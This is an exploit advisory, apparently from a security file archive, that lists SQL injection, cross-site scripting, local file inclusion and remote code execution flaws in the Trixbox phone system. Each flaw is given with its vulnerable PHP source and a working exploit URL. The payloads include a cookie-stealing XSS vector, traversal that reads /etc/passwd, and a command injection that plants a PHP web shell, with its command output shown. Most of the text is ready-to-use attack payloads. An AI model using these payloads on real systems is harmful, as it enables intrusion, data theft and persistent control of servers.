Trixbox XSS / LFI / SQL Injection / Code Execution

Trixbox XSS / LFI / SQL Injection / Code Execution: Posted Jul 17, 2014; Authored by AtT4CKxT3rR0r1ST; Trixbox suffers from cross site scripting, local file inclusion, SQL injection, and remote code execution vulnerabilities.; tags | exploit, remote, local, vulnerability, code execution, xss, sql injection, file inclusion; SHA-256 | 9ef0ed67767e646a6f2d1db382c38acd0e8f214fb1e4961fb49e8336b89d0d82; Download | Favorite | View

Trixbox XSS / LFI / SQL Injection / Code Execution

Trixbox All Version - Multiple Vulnerabilties
===================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://www.trixbox.com/
####################################################################

[1] Sql Injection
===================
VULNERABILITY
##############
[I] /var/www/html/maint/modules/endpointcfg/endpoint_generic.php

Line 79-99:
    case 'Submit':
        $message = "";
        $phone_vars['mac_address'] = cleanMAC($phone_vars['mac_address']);
        if(!preg_match('/^[0-9A-F]{12}$/i', $phone_vars['mac_address']))
{$message = "MAC is invalid";}
        if ($phone_vars['freepbx_device']!="NONE") {  //get list of devices
from FreePBX
            $phone_vars = PopulateFromFreepbx($phone_vars);
        }
        else
        {
        $phone_vars['phone_label'] =
$MACTABLE[substr($phone_vars['mac_address'],0,6)]['vendor'];

        }

        if ($_REQUEST['mac']){ // if there is an ID then edit an existing
phone
        $querytxt = "UPDATE Generic SET ";
        foreach ($phone_vars as $key => $value) {
         $querytxt .= $key. " = '" .trim($value). "',";
        }
        $querytxt .= "EditDate = NOW() WHERE mac_address='" .
$_REQUEST['mac']."'";
        $error = getSQL($querytxt,'endpoints');
          }

#########
EXPLOIT
#########

Http://IP/maint/modules/endpointcfg/endpoint_generic.php?action=Submit&mac=1'
and 1=2 union select 1,2,3,4,5,6-- -

[2] Cross Site Scripting
===========================
VULNERABILITY
##############
[I] /var/www/html/user/help/html/index.php

Line 44:
                       $smarty->assign("id_nodo", $_GET['id_nodo']);

#########
EXPLOIT
#########

Http://IP/user/help/html/index.php?id_nodo="
onmouseover%3dprompt(document.cookie) bad%3d"


[3] Multiple Local File Include
=================================
VULNERABILITY
##############
[I] /var/www/html/maint/modules/home/index.php

Line 68-72:

$tbLang = $_GET['lang'];
$languageFile = 'language/'.$tbLang.'.php';
if(file_exists($languageFile)){
    include($languageFile);
}

#########
EXPLOIT
#########

Http://IP/maint/modules/home/index.php?lang=../../../../../../../../etc/passwd%00

VULNERABILITY
##############
[II] /var/www/html/maint/modules/asterisk_info/asterisk_info.php

Line 17-25:

if(!empty($_GET['lang']) && isset($_GET['lang'])){
    $tbLang = $_GET['lang'];
}else{
    $tbLang = 'english';
}
$languageFile = 'language/'.$tbLang.'.php';
if(file_exists($languageFile)){
    include($languageFile);
}

#########
EXPLOIT
#########
Http://IP/maint/modules/asterisk_info/asterisk_info.php?lang=../../../../../../../../etc/passwd%00

VULNERABILITY
##############
[III] /var/www/html/maint/modules/repo/repo.php

Line 9-13:

$tbLang = $_GET['lang'];
$languageFile = 'language/'.$tbLang.'.php';
if(file_exists($languageFile)){
    include($languageFile);
}

#########
EXPLOIT
#########
Http://IP/maint/modules/repo/repo.php?lang=../../../../../../../../etc/passwd%00

VULNERABILITY
##############
[V] /var/www/html/maint/modules/endpointcfg/endpointcfg.php

Line 29-33:

if(!empty($_GET['lang']) && isset($_GET['lang'])){
    $languageFile = includeLanguage($_GET['lang']);
    include($languageFile);
    $tbLang = $_GET['lang'];
}else{

#########
EXPLOIT
#########
Http://IP/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00

[4] Remote Code Execution
===========================
VULNERABILITY
##############
[I] /var/www/html/maint/modules/home/index.php

Line 339:

    $phpOutput = shell_exec('php -q libs/status.php '.$tbLang);//exec('perl
libs/status.pl');

Line 68:

    $tbLang = $_GET['lang'];

#########
EXPLOIT
#########

Http://IP/maint/modules/home/index.php?lang=MF;echo "<?php
system(\$_GET['cmd']);?> \$Greats 2 MY=\"Love:D">shell.php

Your Shell

Http://IP/maint/modules/home/shell.php?cmd=id
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk) $Greats 2
MY="Love:D
####################################################################

Top Authors In Last 30 Days

Red Hat 229 files
indoushka 167 files
Jay Turla 150 files
Ubuntu 67 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

Trixbox XSS / LFI / SQL Injection / Code Execution

Trixbox XSS / LFI / SQL Injection / Code Execution

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Trixbox XSS / LFI / SQL Injection / Code Execution

Share This

Trixbox XSS / LFI / SQL Injection / Code Execution

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems